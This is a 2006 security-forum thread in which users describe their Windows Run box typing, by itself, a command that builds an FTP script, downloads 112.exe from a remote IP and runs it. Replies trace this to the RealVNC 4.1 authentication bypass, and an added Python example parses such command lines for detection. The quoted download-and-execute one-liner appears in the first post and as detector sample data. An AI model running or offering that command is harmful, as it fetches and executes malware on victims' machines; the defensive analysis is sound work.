intrusion or virus?

Networking/Security Forums -> Firewalls // Intrusion Detection - External Security

Author: calvin43 Posted: Fri Nov 03, 2006 4:42 pm    Post subject: intrusion or virus?
    ----
Hi all,
I would like to get some help. My Start > Run box opens by itself and I can see this string as if someone was typing it in:
cmd.exe /c del i&echo open 81.128.84.212 7085 > i&echo user 1 1 >> i &echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit
Obviously 81.128.84.212 was my IP address.
I can't get rid of it.
Any help will be very appreciated.
Thanks
davide

Author: kinolux Location: Luxembourg Posted: Mon Nov 06, 2006 2:04 am    Post subject: VNC server running?
    ----
Hi Davide,

I have also had the same problem since Friday. Do you have VNC server always running on your PC? Then disabling it may help.
I found that the VNC Server icon in the task tray was black when I had this problem, as if "somebody" was connecting and playing with my PC.
I think it's due to a kind of virus program which is running on my PC and simulating remote control....
Probably it's a very new virus and no anti-virus program can detect it yet? I tried 2 checking programs (CA and Trend-Micro) but didn't find anything.

kino

Author: calvin43 Posted: Mon Nov 06, 2006 10:19 am    Post subject: Intrusion or virus
    ----
Hi Kino,
Yes, I do have VNC 4.1 free edition and I have done the upgrade to the 4.2.6 version. Actually it seems that the problem stopped. But I think that I still have the program on my PC. I think it's a rootkit. My AVG Antivirus and Spyware Doctor antispyware can't see that malware.
To monitor what is happening on my computer I downloaded these programs:
Net Alert 2001
http://members.ozemail.com.au/~aschnaider/netalert.htm
CurrPorts
http://www.nirsoft.net/
To detect rootkits and protect myself I use Cyberhawk and Sophos Anti-Rootkit:
http://www.novatix.com/Cyberhawk/
http://www.sophos.it/products/free-tools/sophos-anti-rootkit.html
To check the status of my vulnerability I used Shields Up! on this site:
http://www.grc.com/default.htm
Anyway, I have seen around that it isn't just us with that problem.
davide

Author: Sgt_B Location: Chicago, IL US Posted: Mon Nov 06, 2006 11:37 pm    Post subject:
    ----
Good times with the RealVNC 4.1 Authentication Bypass Vulnerability
Patching your system should reduce the risk that you'll be compromised again. An attacker can leverage this issue against you in order to establish a remote session with your PC without knowing your VNC password. This isn't just you.

Post exploitation the attacker appeared to create an FTP script in order to download a utility named 112.exe. This is likely a backdoor/rootkit/nasty nasty thing designed to allow the attacker to maintain control over your machine.

Getting rid of it? Well I've got no idea what 112.exe is but you may want to head over to the HijackThis forum on this site. They're insanely intelligent when it comes to these kinds of things, and maybe they'll be able to help you out.
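
For anyone reviewing process or command-line logs for the pattern described in the post above, this added example (not part of the original thread) parses an `&`-chained command line, ties the echo-built script to `ftp -s:`, and reports the server, the fetched file and whether it was then run. The first sample is the string quoted in the first post; the other two samples, the function name and the verdict labels are assumptions made for illustration.

```python
import re

# First entry is the command line quoted in the thread; the other two are constructed benign cases.
SAMPLE_EVENTS = [
    "cmd.exe /c del i&echo open 81.128.84.212 7085 > i&echo user 1 1 >> i "
    "&echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit",
    "cmd.exe /c echo build finished > build.log",
    "ftp -n -s:C:\\scripts\\nightly_upload.txt backup.example.internal",
]

ECHO_RE = re.compile(r"\becho\s+(.*?)\s*>>?\s*(\S+)$", re.I)   # echo <text> > file
FTP_RE = re.compile(r"\bftp(?:\.exe)?\s.*-s:(\S+)", re.I)      # ftp ... -s:<script>

def analyze(cmdline):
    """Summarise an '&'-chained command line that drives ftp.exe from a script file."""
    segments = [s.strip() for s in cmdline.split("&") if s.strip()]
    info = {"script": None, "host": None, "port": None,
            "fetched": [], "executed": [], "verdict": None}
    written = set()                      # files created by echo redirection
    for seg in segments:
        m = ECHO_RE.search(seg)
        if m:
            words, target = m.group(1).split(), m.group(2).lower()
            written.add(target)
            if len(words) >= 2 and words[0].lower() == "open":
                info["host"] = words[1]
                info["port"] = int(words[2]) if len(words) > 2 and words[2].isdigit() else 21
            elif len(words) >= 2 and words[0].lower() == "get":
                info["fetched"].append(words[1])
            continue
        m = FTP_RE.search(seg)
        if m:
            info["script"] = m.group(1)
            continue
        first = seg.split()[0].lower()
        if first in (f.lower() for f in info["fetched"]):
            info["executed"].append(seg.split()[0])   # fetched file run in the same chain
    inline = info["script"] is not None and info["script"].lower() in written
    if inline and info["fetched"] and info["executed"]:
        info["verdict"] = "download-and-execute"
    elif inline and info["fetched"]:
        info["verdict"] = "scripted-download"
    elif info["script"]:
        info["verdict"] = "ftp-script"
    return info

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(analyze(event))
```

A scheduled job that points `ftp -s:` at a script file already on disk only gets the low-signal `ftp-script` label, so the stronger verdicts are reserved for chains that write the script inline and then run what they fetched.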

Author: Micro-Shock Posted: Thu Nov 09, 2006 2:41 am    Post subject: Intrusion or virus
    ----
Hey....
Was wondering if there was an update to this. I have been getting the same thing... every time though it is a different exe file... on each machine. Is there a new worm out that is doing this automated now? Seen 3 computers.. different exe file names.... and located in 3 different countries... trying to find a common link between them.

Thanks for any information you can provide. I am at a loss.... I would think VNC ... 4.1.1 but... at least one of the users.... running a firewall on the laptop... plus a hardware firewall/GW and managed to get the same thing....

Virus scans turn up nothing...

Author: calvin43 Posted: Thu Nov 09, 2006 1:57 pm    Post subject:
    ----
I upgraded VNC Viewer to the professional version and the problem has gone.
davide



All times are GMT + 2 Hours